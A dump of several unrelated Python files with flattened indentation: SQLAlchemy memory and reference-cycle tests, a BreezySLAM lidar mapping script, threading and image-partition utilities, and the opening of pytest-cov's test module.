type_ = args[0](*args[1:])
bp = type_._cached_bind_processor(eng.dialect)
rp = type_._cached_result_processor(eng.dialect, 0)
bp, rp # strong reference
go()
assert not eng.dialect._type_memos
@testing.fails()
def test_fixture_failure(self):
class Foo:
pass
stuff = []
@profile_memory(maxtimes=20)
def go():
stuff.extend(Foo() for i in range(100))
go()
class MemUsageWBackendTest(fixtures.MappedTest, EnsureZeroed):
__tags__ = ("memory_intensive",)
__requires__ = "cpython", "memory_process_intensive", "no_asyncio"
__sparse_backend__ = True
# ensure a pure growing test trips the assertion
@testing.fails_if(lambda: True)
def test_fixture(self):
class Foo:
pass
x = []
@profile_memory(maxtimes=10)
def go():
x[-1:] = [Foo(), Foo(), Foo(), Foo(), Foo(), Foo()]
go()
def test_session(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all(self.engine)
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
)
m2 = self.mapper_registry.map_imperatively(B, table2)
@profile_memory()
def go():
with Session(self.engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
go()
metadata.drop_all(self.engine)
del m1, m2
assert_no_mappers()
def test_sessionmaker(self):
@profile_memory()
def go():
sessmaker = sessionmaker(bind=self.engine)
sess = sessmaker()
r = sess.execute(select(1))
r.close()
sess.close()
del sess
del sessmaker
go()
@testing.emits_warning("Compiled statement cache for mapper.*")
@testing.emits_warning("Compiled statement cache for lazy loader.*")
@testing.crashes("sqlite", ":memory: connection not suitable here")
def test_orm_many_engines(self):
metadata = MetaData(self.engine)
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
metadata.create_all()
m1 = self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, cascade="all, delete", order_by=table2.c.col1
)
},
_compiled_cache_size=50,
)
m2 = self.mapper_registry.map_imperatively(
B, table2, _compiled_cache_size=50
)
@profile_memory()
def go():
engine = engines.testing_engine(
options={
"logging_name": "FOO",
"pool_logging_name": "BAR",
"use_reaper": False,
}
)
with Session(engine) as sess:
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.commit()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.commit()
engine.dispose()
go()
metadata.drop_all()
del m1, m2
assert_no_mappers()
@testing.emits_warning("Compiled statement cache for.*")
def test_many_updates(self):
metadata = MetaData()
wide_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
*[Column("col%d" % i, Integer) for i in range(10)]
)
class Wide:
pass
self.mapper_registry.map_imperatively(
Wide, wide_table, _compiled_cache_size=10
)
metadata.create_all(self.engine)
with Session(self.engine) as session:
w1 = Wide()
session.add(w1)
session.commit()
del session
counter = [1]
@profile_memory()
def go():
with Session(self.engine) as session:
w1 = session.query(Wide).first()
x = counter[0]
dec = 10
while dec > 0:
# trying to count in binary here,
# works enough to trip the test case
if pow(2, dec) < x:
setattr(w1, "col%d" % dec, counter[0])
x -= pow(2, dec)
dec -= 1
session.commit()
counter[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.requires.savepoints
def test_savepoints(self):
metadata = MetaData()
some_table = Table(
"t",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
class SomeClass:
pass
self.mapper_registry.map_imperatively(SomeClass, some_table)
metadata.create_all(self.engine)
with Session(self.engine) as session:
target_strings = (
session.connection().dialect.identifier_preparer._strings
)
@profile_memory(
assert_no_sessions=False,
get_num_objects=lambda: len(target_strings),
)
def go():
with Session(self.engine) as session, session.begin():
sc = SomeClass()
session.add(sc)
with session.begin_nested():
session.query(SomeClass).first()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_unicode_warnings(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", Unicode(30)),
)
metadata.create_all(self.engine)
i = [1]
# the times here is cranked way up so that we can see
# pysqlite clearing out its internal buffer and allow
# the test to pass
@testing.emits_warning()
@profile_memory()
def go():
# execute with a non-unicode object. a warning is emitted,
# this warning shouldn't clog up memory.
with self.engine.connect() as conn:
conn.execute(
table1.select().where(table1.c.col2 == "foo%d" % i[0])
)
i[0] += 1
try:
go()
finally:
metadata.drop_all(self.engine)
def test_warnings_util(self):
counter = itertools.count()
import warnings
warnings.filterwarnings("ignore", "memusage warning.*")
@profile_memory()
def go():
util.warn_limited(
"memusage warning, param1: %s, param2: %s",
(next(counter), next(counter)),
)
go()
def test_mapper_reset(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
Column("col3", Integer, ForeignKey("mytable.col1")),
)
@profile_memory()
def go():
self.mapper_registry.map_imperatively(
A,
table1,
properties={"bs": relationship(B, order_by=table2.c.col1)},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
a3 = A(col2="a3")
a1.bs.append(B(col2="b1"))
a1.bs.append(B(col2="b2"))
a3.bs.append(B(col2="b3"))
for x in [a1, a2, a3]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_(
[
A(col2="a1", bs=[B(col2="b1"), B(col2="b2")]),
A(col2="a2", bs=[]),
A(col2="a3", bs=[B(col2="b3")]),
],
alist,
)
for a in alist:
sess.delete(a)
sess.flush()
sess.close()
clear_mappers()
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_alias_pathing(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("bid", Integer, ForeignKey("b.id")),
Column("type", String(30)),
)
asub = Table(
"asub",
metadata,
Column("id", Integer, ForeignKey("a.id"), primary_key=True),
Column("data", String(30)),
)
b = Table(
"b",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
)
self.mapper_registry.map_imperatively(
A, a, polymorphic_identity="a", polymorphic_on=a.c.type
)
self.mapper_registry.map_imperatively(
ASub, asub, inherits=A, polymorphic_identity="asub"
)
self.mapper_registry.map_imperatively(
B, b, properties={"as_": relationship(A)}
)
metadata.create_all(self.engine)
sess = Session(self.engine)
a1 = ASub(data="a1")
a2 = ASub(data="a2")
a3 = ASub(data="a3")
b1 = B(as_=[a1, a2, a3])
sess.add(b1)
sess.commit()
del sess
# sqlite has a slow enough growth here
# that we have to run it more times to see the
# "dip" again
@profile_memory(maxtimes=120)
def go():
sess = Session(self.engine)
sess.query(B).options(subqueryload(B.as_.of_type(ASub))).all()
sess.close()
del sess
try:
go()
finally:
metadata.drop_all(self.engine)
clear_mappers()
def test_path_registry(self):
metadata = MetaData()
a = Table(
"a",
metadata,
Column("id", Integer, primary_key=True),
Column("foo", Integer),
Column("bar", Integer),
)
b = Table(
"b",
metadata,
Column("id", Integer, primary_key=True),
Column("a_id", ForeignKey("a.id")),
)
m1 = self.mapper_registry.map_imperatively(
A, a, properties={"bs": relationship(B)}
)
self.mapper_registry.map_imperatively(B, b)
@profile_memory()
def go():
ma = sa.inspect(aliased(A))
m1._path_registry[m1.attrs.bs][ma][m1.attrs.bar]
go()
clear_mappers()
def test_with_inheritance(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
ForeignKey("mytable.col1"),
primary_key=True,
test_needs_autoincrement=True,
),
Column("col3", String(30)),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(A):
pass
clear_mappers()
self.mapper_registry.map_imperatively(
A,
table1,
polymorphic_on=table1.c.col2,
polymorphic_identity="a",
)
self.mapper_registry.map_imperatively(
B, table2, inherits=A, polymorphic_identity="b"
)
sess = Session(self.engine, autoflush=False)
a1 = A()
a2 = A()
b1 = B(col3="b1")
b2 = B(col3="b2")
for x in [a1, a2, b1, b2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(), A(), B(col3="b1"), B(col3="b2")], alist)
for a in alist:
sess.delete(a)
sess.flush()
# don't need to clear_mappers()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_with_manytomany(self):
metadata = MetaData()
table1 = Table(
"mytable",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table2 = Table(
"mytable2",
metadata,
Column(
"col1",
Integer,
primary_key=True,
test_needs_autoincrement=True,
),
Column("col2", String(30)),
)
table3 = Table(
"t1tot2",
metadata,
Column("t1", Integer, ForeignKey("mytable.col1")),
Column("t2", Integer, ForeignKey("mytable2.col1")),
)
@profile_memory()
def go():
class A(fixtures.ComparableEntity):
pass
class B(fixtures.ComparableEntity):
pass
self.mapper_registry.map_imperatively(
A,
table1,
properties={
"bs": relationship(
B, secondary=table3, backref="as", order_by=table3.c.t1
)
},
)
self.mapper_registry.map_imperatively(B, table2)
sess = Session(self.engine, autoflush=False)
a1 = A(col2="a1")
a2 = A(col2="a2")
b1 = B(col2="b1")
b2 = B(col2="b2")
a1.bs.append(b1)
a2.bs.append(b2)
for x in [a1, a2]:
sess.add(x)
sess.flush()
sess.expunge_all()
alist = sess.query(A).order_by(A.col1).all()
eq_([A(bs=[B(col2="b1")]), A(bs=[B(col2="b2")])], alist)
for a in alist:
sess.delete(a)
sess.flush()
# mappers necessarily find themselves in the compiled cache,
# so to allow them to be GC'ed clear out the cache
self.engine.clear_compiled_cache()
del B
del A
metadata.create_all(self.engine)
try:
go()
finally:
metadata.drop_all(self.engine)
assert_no_mappers()
def test_many_discarded_relationships(self):
"""a use case that really isn't supported, nonetheless we can
guard against memleaks here so why not"""
m1 = MetaData()
t1 = Table("t1", m1, Column("id", Integer, primary_key=True))
t2 = Table(
"t2",
m1,
Column("id", Integer, primary_key=True),
Column("t1id", ForeignKey("t1.id")),
)
class T1:
pass
t1_mapper = self.mapper_registry.map_imperatively(T1, t1)
@testing.emits_warning()
@profile_memory()
def go():
class T2:
pass
t2_mapper = self.mapper_registry.map_imperatively(T2, t2)
t1_mapper.add_property("bar", relationship(t2_mapper))
s1 = Session(testing.db)
# this causes the path_registry to be invoked
s1.query(t1_mapper)._compile_context()
go()
# fails on newer versions of pysqlite due to unusual memory behavior
# in pysqlite itself. background at:
# https://thread.gmane.org/gmane.comp.python.db.pysqlite.user/2290
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache_deprecated_coercion(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = table2.select()
sess = session()
with testing.expect_deprecated(
"Implicit coercion of SELECT and " "textual SELECT constructs"
):
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
@testing.crashes("mysql+cymysql", "blocking")
def test_join_cache(self):
metadata = MetaData()
table1 = Table(
"table1",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
)
table2 = Table(
"table2",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("data", String(30)),
Column("t1id", Integer, ForeignKey("table1.id")),
)
class Foo:
pass
class Bar:
pass
self.mapper_registry.map_imperatively(
Foo,
table1,
properties={
"bars": relationship(
self.mapper_registry.map_imperatively(Bar, table2)
)
},
)
metadata.create_all(self.engine)
session = sessionmaker(self.engine)
@profile_memory()
def go():
s = aliased(Bar, table2.select().subquery())
sess = session()
sess.query(Foo).join(s, Foo.bars).all()
sess.rollback()
try:
go()
finally:
metadata.drop_all(self.engine)
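# The tests below use the assert_cycles() helper to verify that common ORM
# operations do not leave reference cycles behind (beyond the small
# allowances passed to the decorator in a few cases).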
class CycleTest(_fixtures.FixtureTest):
__tags__ = ("memory_intensive",)
__requires__ = ("cpython", "no_windows")
run_setup_mappers = "once"
run_inserts = "once"
run_deletes = None
@classmethod
def setup_mappers(cls):
cls._setup_stock_mapping()
def test_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).all()
go()
def test_session_execute_orm(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
stmt = select(User)
s.execute(stmt)
go()
def test_cache_key(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
stmt = select(User)
stmt._generate_cache_key()
go()
def test_proxied_attribute(self):
from sqlalchemy.ext import hybrid
users = self.tables.users
class Foo:
@hybrid.hybrid_property
def user_name(self):
return self.name
self.mapper_registry.map_imperatively(Foo, users)
# unfortunately there are a lot of cycles with an aliased()
# for now; however, calling __clause_element__ does not seem
# to make it worse, which is what this test is checking
@assert_cycles(69)
def go():
a1 = aliased(Foo)
a1.user_name.__clause_element__()
go()
def test_raise_from(self):
@assert_cycles()
def go():
try:
try:
raise KeyError("foo")
except KeyError as ke:
util.raise_(Exception("oops"), from_=ke)
except Exception as err: # noqa
pass
go()
def test_query_alias(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
u1 = aliased(User)
@assert_cycles()
def go():
s.query(u1).all()
go()
def test_entity_path_w_aliased(self):
User, Address = self.classes("User", "Address")
configure_mappers()
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)._path_registry[User.addresses.property]
go()
def test_orm_objects_from_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
def generate():
objects = s.query(User).filter(User.id == 7).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_orm_objects_from_query_w_selectinload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(selectinload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_selectinload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
selectinload(User.addresses)
go()
def test_selectinload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
Load(User).selectinload(User.addresses)
go()
def test_orm_path(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
inspect(User)._path_registry[User.addresses.property][
inspect(Address)
]
go()
def test_joinedload_option_unbound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
joinedload(User.addresses)
go()
def test_joinedload_option_bound(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
l1 = Load(User).joinedload(User.addresses)
l1._generate_cache_key()
go()
def test_orm_objects_from_query_w_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
objects = s.query(User).options(joinedload(User.addresses)).all()
gc_collect()
return objects
@assert_cycles()
def go():
generate()
go()
def test_query_filtered(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
@assert_cycles()
def go():
return s.query(User).filter(User.id == 7).all()
go()
def test_query_joins(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
# cycles here are due to ClauseElement._cloned_set; the
# others come from the cache key
@assert_cycles(4)
def go():
s.query(User).join(User.addresses).all()
go()
def test_query_joinedload(self):
User, Address = self.classes("User", "Address")
s = fixture_session()
def generate():
s.query(User).options(joinedload(User.addresses)).all()
# cycles here are due to ClauseElement._cloned_set and Load.context;
# the others come from the cache key. The orm.instances() function now
# calls dispose() on both the context and the compiled state to try
# to reduce these cycles.
@assert_cycles(18)
def go():
generate()
go()
def test_plain_join(self):
users, addresses = self.tables("users", "addresses")
@assert_cycles()
def go():
str(users.join(addresses).compile(testing.db))
go()
def test_plain_join_select(self):
users, addresses = self.tables("users", "addresses")
# cycles here are due to ClauseElement._cloned_set; the
# others come from the cache key
@assert_cycles(7)
def go():
s = select(users).select_from(users.join(addresses))
state = s._compile_state_factory(s, s.compile(testing.db))
state.froms
go()
def test_orm_join(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
str(orm_join(User, Address, User.addresses).compile(testing.db))
go()
def test_join_via_query_relationship(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(User.addresses)
go()
def test_join_via_query_to_entity(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
@assert_cycles()
def go():
s.query(User).join(Address)
go()
def test_result_fetchone(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.connection(mapper=User).execute(stmt)
while True:
row = result.fetchone()
if row is None:
break
go()
def test_result_fetchall(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
rows = result.fetchall() # noqa
go()
def test_result_fetchmany(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.partitions(3):
pass
go()
def test_result_fetchmany_unique(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
@assert_cycles(4)
def go():
result = s.execute(stmt)
for partition in result.unique().partitions(3):
pass
go()
def test_core_select_from_orm_query(self):
User, Address = self.classes("User", "Address")
configure_mappers()
s = fixture_session()
stmt = s.query(User).join(User.addresses).statement
# The ORM query using future select for .statement adds some
# ORMJoin cycles here during compilation; not worth trying to
# track them down
@assert_cycles(4)
def go():
s.execute(stmt)
go()
def test_adapt_statement_replacement_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
replacement_traverse(statement, {}, lambda x: None)
go()
def test_adapt_statement_cloned_traversal(self):
User, Address = self.classes("User", "Address")
statement = select(User).select_from(
orm_join(User, Address, User.addresses)
)
@assert_cycles()
def go():
cloned_traverse(statement, {}, {})
go()
def test_column_adapter_lookup(self):
User, Address = self.classes("User", "Address")
u1 = aliased(User)
@assert_cycles()
def go():
adapter = sql_util.ColumnAdapter(inspect(u1).selectable)
adapter.columns[User.id]
go()
def test_orm_aliased(self):
User, Address = self.classes("User", "Address")
@assert_cycles()
def go():
u1 = aliased(User)
inspect(u1)
go()
@testing.fails()
def test_the_counter(self):
@assert_cycles()
def go():
x = []
x.append(x)
go()
def test_weak_sequence(self):
class Foo:
pass
f = Foo()
@assert_cycles()
def go():
util.WeakSequence([f])
go()
@testing.provide_metadata
def test_optimized_get(self):
Base = declarative_base(metadata=self.metadata)
class Employee(Base):
__tablename__ = "employee"
id = Column(
Integer, primary_key=True, test_needs_autoincrement=True
)
type = Column(String(10))
__mapper_args__ = {"polymorphic_on": type}
class Engineer(Employee):
__tablename__ = " engineer"
id = Column(ForeignKey("employee.id"), primary_key=True)
engineer_name = Column(String(50))
__mapper_args__ = {"polymorphic_identity": "engineer"}
Base.metadata.create_all(testing.db)
s = Session(testing.db)
s.add(Engineer(engineer_name="wally"))
s.commit()
s.close()
@assert_cycles()
def go():
e1 = s.query(Employee).first()
e1.engineer_name
go()
def test_visit_binary_product(self):
a, b, q, e, f, j, r = [column(chr_) for chr_ in "abqefjr"]
from sqlalchemy import and_, func
from sqlalchemy.sql.util import visit_binary_product
expr = and_((a + b) == q + func.sum(e + f), j == r)
def visit(expr, left, right):
pass
@assert_cycles()
def go():
visit_binary_product(visit, expr)
go()
def test_session_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.close()
go()
def test_session_commit_rollback(self):
# this is enabled by #5074
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.commit()
go()
@assert_cycles()
def go():
s = Session(testing.db)
s.connection()
s.rollback()
go()
def test_session_multi_transaction(self):
@assert_cycles()
def go():
s = Session(testing.db)
assert s._transaction is None
s.connection()
s.close()
assert s._transaction is None
s.connection()
assert s._transaction is not None
s.close()
go()
|
slam.py
|
from breezylidar import URG04LX as Lidar
from breezyslam.algorithms import RMHC_SLAM
from breezyslam.sensors import URG04LX as LaserModel
from slam_visualization import SlamShow
import threading
from time import sleep
MAP_SIZE_PIXELS = 500
MAP_SIZE_METERS = 10
def save_image(display):
while True:
display.save_image()
sleep(1)
def main():
lidar = Lidar(device='/dev/ttyACM0')
slam = RMHC_SLAM(LaserModel(), map_size_pixels=MAP_SIZE_PIXELS, map_size_meters=MAP_SIZE_METERS)
display = SlamShow(MAP_SIZE_PIXELS, MAP_SIZE_METERS*1000/MAP_SIZE_PIXELS, 'SLAM')
#image_thread = threading.Thread(target=save_image, args=[display])
#image_thread.start()
mapbytes = bytearray(MAP_SIZE_PIXELS * MAP_SIZE_PIXELS)
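# Main loop: feed each lidar scan to the SLAM algorithm, then redraw the
# map and the estimated pose until the display window is closed.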
while True:
slam.update(lidar.getScan())
x, y, theta = slam.getpos()
#print(x, y, theta)
slam.getmap(mapbytes)
display.displayMap(mapbytes)
display.setPose(x, y, theta)
#display.save_image()
display.save_pgm(mapbytes)
if not display.refresh():
exit(0)
if __name__ == '__main__':
main()
|
utils.py
|
import os
import numpy as np
from itertools import zip_longest, accumulate, product, repeat
from types_utils import F
from typing import Any, Iterable, Callable, Sized
from threading import Thread
PATH = os.path.dirname(__file__)
RESOURCES_PATH = os.path.abspath(f"{PATH}/../resources")
def start_join_threads(threads: Iterable["Thread"]) -> None:
"""
Starts all the given threads, then joins them.
:param threads: An iterable of threads.
"""
for t in threads:
t.start()
for t in threads:
t.join()
def grouper(iterable: Iterable, n: int):
"""
Groups the iterable into an iterable of iterables of length n,
e.g. ((x0, x1, ..., xn-1), (xn, xn+1, ..., x2n-1), ...)
:param iterable: The iterable to be grouped.
:param n: The length of the groups. (The last group may be shorter than n.)
"""
return zip_discard_generator(*([iter(iterable)] * n))
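# Example (illustrative): list(map(tuple, grouper(range(7), 3)))
# -> [(0, 1, 2), (3, 4, 5), (6,)]
# zip_longest pads the last group with a sentinel object; the inner
# generators below drop those padding entries again.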
def zip_discard_generator(*iterables, sentinel: Any = object()):
return ((entry for entry in iterable if entry is not sentinel)
for iterable in zip_longest(*iterables, fillvalue=sentinel))
def parallel_evaluate_iterable(iterable, generate_thread_func: Callable[..., Thread], num_threads: int):
"""
Evaluates a function over an iterable in parallel over several threads.
:param iterable: The items to be evaluated.
:param generate_thread_func: A function that, given an item, returns a Thread that evaluates it.
:param num_threads: The number of threads to use.
"""
if len(iterable) < num_threads:
threads = map(generate_thread_func, iterable)
start_join_threads(threads)
else:
for g in grouper(iterable, num_threads):
threads = map(generate_thread_func, g)
start_join_threads(threads)
def thread_wrapper(func: F):
"""
Wraps a function into a thread call.
:param func: The function to be wrapped.
"""
def wrapper(*args, **kwargs):
return Thread(target=func, args=args, kwargs=kwargs)
return wrapper
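# Example (illustrative): a function decorated with @thread_wrapper returns an
# unstarted Thread when called, e.g. t = wrapped_func(arg); t.start(); t.join()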
def partitions_with_overlap(image, partition_sizes, partitions_per_dim):
"""
Partition an image, with overlap, into a list of sub-images.
:param image: The image to partition.
:param partition_sizes: The size of each partition in each dimension.
:param partitions_per_dim: The number of partitions per dimension.
:return: A list of images.
"""
shape = image.shape
assert len(shape) == len(partition_sizes) == len(partitions_per_dim)
dim_parts = []
for s, p, n in zip(shape, partition_sizes, partitions_per_dim):
strides = [(0, p)]
if n > 1:
overlap_diff = p - (p * n - s) / (n - 1)
strides.extend([(a, a + p) for a in accumulate(repeat(overlap_diff, n - 1))])
dim_parts.append(strides)
# index with a tuple of slices (newer NumPy rejects a list of slices here)
return [image[tuple(np.s_[round(d0):round(d1)] for d0, d1 in dim_splits)] for dim_splits in product(*dim_parts)]
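# Example (illustrative): partitions_with_overlap(np.zeros((4, 4)), (2, 2), (3, 3))
# yields 9 overlapping 2x2 tiles.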
|
test_pytest_cov.py
|
import glob
import os
import subprocess
import sys
from distutils.version import StrictVersion
from itertools import chain
import coverage
import py
import pytest
import virtualenv
from process_tests import TestProcess as _TestProcess
from process_tests import dump_on_error
from process_tests import wait_for_strings
from six import exec_
from fields import Namespace
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import pytest_cov.plugin
coverage, StrictVersion # required for skipif mark on test_cov_min_from_coveragerc
SCRIPT = '''
import sys, helper
def pytest_generate_tests(metafunc):
for i in range(10):
metafunc.addcall()
def test_foo():
x = True
helper.do_stuff() # get some coverage in some other completely different location
if sys.version_info[0] > 5:
assert False
'''
SCRIPT2 = '''
#
def test_bar():
x = True
assert x
'''
COVERAGERC_SOURCE = '''\
[run]
source = .
'''
SCRIPT_CHILD = '''
import sys
idx = int(sys.argv[1])
if idx == 0:
foo = "a" # previously there was a "pass" here but Python 3.5 optimizes it away.
if idx == 1:
foo = "b" # previously there was a "pass" here but Python 3.5 optimizes it away.
'''
SCRIPT_PARENT = '''
import os
import subprocess
import sys
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
out, err = subprocess.Popen(
[sys.executable, os.path.join(os.path.dirname(__file__), 'child_script.py'), str(idx)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
# there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
os.path.join(os.path.dirname(__file__), 'child_script.py'),
str(idx)
])
# there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_PARENT_CHANGE_CWD_IMPORT_CHILD = '''
import subprocess
import sys
import os
def pytest_generate_tests(metafunc):
for i in range(2):
metafunc.addcall(funcargs=dict(idx=i))
def test_foo(idx):
os.mkdir("foobar")
os.chdir("foobar")
subprocess.check_call([
sys.executable,
'-c', 'import sys; sys.argv = ["", str(%s)]; import child_script' % idx
])
# there is an issue in coverage.py with multiline statements at
# end of file: https://bitbucket.org/ned/coveragepy/issue/293
pass
'''
SCRIPT_FUNCARG = '''
import coverage
def test_foo(cov):
assert isinstance(cov, coverage.coverage)
'''
SCRIPT_FUNCARG_NOT_ACTIVE = '''
def test_foo(cov):
assert cov is None
'''
SCRIPT_FAIL = '''
def test_fail():
assert False
'''
CHILD_SCRIPT_RESULT = '[56] * 100%'
PARENT_SCRIPT_RESULT = '9 * 100%'
DEST_DIR = 'cov_dest'
REPORT_NAME = 'cov.xml'
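# Run each decorated test twice: once without xdist ('') and once distributed
# to a single worker ('-n 1').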
xdist = pytest.mark.parametrize('opts', ['', '-n 1'], ids=['nodist', 'xdist'])
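# Bundles the test script, .coveragerc contents, extra command-line arguments
# and the expected coverage figures for each branch-coverage combination.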
@pytest.fixture(params=[
('branch=true', '--cov-branch', '9 * 85%', '3 * 100%'),
('branch=true', '', '9 * 85%', '3 * 100%'),
('', '--cov-branch', '9 * 85%', '3 * 100%'),
('', '', '9 * 89%', '3 * 100%'),
], ids=['branch2x', 'branch1c', 'branch1a', 'nobranch'])
def prop(request):
return Namespace(
code=SCRIPT,
code2=SCRIPT2,
conf=request.param[0],
fullconf='[run]\n%s\n' % request.param[0],
prefixedfullconf='[coverage:run]\n%s\n' % request.param[0],
args=request.param[1].split(),
result=request.param[2],
result2=request.param[3],
)
def test_central(testdir, prop):
script = testdir.makepyfile(prop.code)
